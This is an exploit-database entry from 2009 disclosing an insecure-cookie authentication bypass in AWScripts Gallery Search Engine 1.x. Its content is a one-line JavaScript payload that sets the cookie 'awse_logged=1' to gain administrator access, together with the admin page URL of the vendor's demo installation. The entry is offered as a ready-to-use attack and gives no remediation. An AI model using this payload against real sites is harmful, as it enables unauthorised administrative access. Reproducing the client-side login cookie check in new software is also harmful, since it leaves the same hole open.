[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : AWScripts Gallery Search Engine 1.x Insecure Cookie Vulnerability
# Published : 2009-06-22
# Author : TiGeR-Dz
# Previous Title : Elgg (XSS/CSRF/Change Password) Multiple Remote Vulnerabilities
# Next Title : Campsite 3.3.0 RC1 Multiple Remote File Inclusion Vulnerabilities


#################################################################################################################
[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
[+] Discovered By TiGeR-Dz
#################################################################################################################
Cookie Insecure
+++++++++++++++++++++++++
javascript:document.cookie="awse_logged=1;path=/";
Demo
----
http://www.awscripts.com/demo_se/awse/awse_admin/index.php
################################################################################################################


# www.Syue.com [2009-06-22]